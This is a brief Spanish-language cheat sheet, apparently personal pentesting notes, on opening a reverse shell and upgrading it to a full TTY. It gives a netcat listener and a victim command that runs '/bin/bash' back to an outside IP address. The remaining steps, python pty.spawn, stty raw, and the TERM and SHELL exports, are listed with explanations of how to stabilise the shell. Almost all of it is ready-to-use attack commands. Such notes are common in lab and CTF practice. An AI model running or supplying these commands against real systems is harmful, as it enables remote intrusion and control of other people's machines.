~avz

Principios teóricos

• Atacante: nc -lvnp 5555
• Víctima: nc 79.117.0.209 5555 -e /bin/bash

  Tratamiento para el TTY

  Invoca el TTY:

• Si tiene Python: python3 -c 'import pty; pty.spawn("/bin/bash")
• Alternativa: script /dev/null -c bash

Prepara el TTY:

tcuser@647a82f29ca0:~/bin$ ^Z
[1]  + 746936 suspended  nc -lvnp 443
❯ stty raw -echo; fg
[1]  + 746936 continued  nc -lvnp 443
                                     reset xterm
tcuser@647a82f29ca0:~/bin$ export TERM=xterm
tcuser@647a82f29ca0:~/bin$ export SHELL=bash
tcuser@647a82f29ca0:~/bin$ stty rows 50 cols 184

• ctrl+z: Suspende el proceso de tu revshell.
• stty raw -echo;fg: Desactiva los comandos siendo repetidos, fg te devuelve a la revshell.
• reset xterm: Reinicia el terminal para que te devuelva el TTY.
• export TERM=xterm: Indica qué terminal estás usando. Ahora puedes hacer ctrl+l para limpiar el terminal.
• export SHELL=bash: Indica al sistema que estás usando bash. Ahora puedes hacer ctrl+c y no saldrás de tu revshell.
• stty rows <YOUR ROWS> cols <YOUR COLUMNS>: Establece el tamaño real de la terminal. Para saberlo, ejecuta en otra pestaña stty size. Ejemplo final: stty rows 50 cols 184.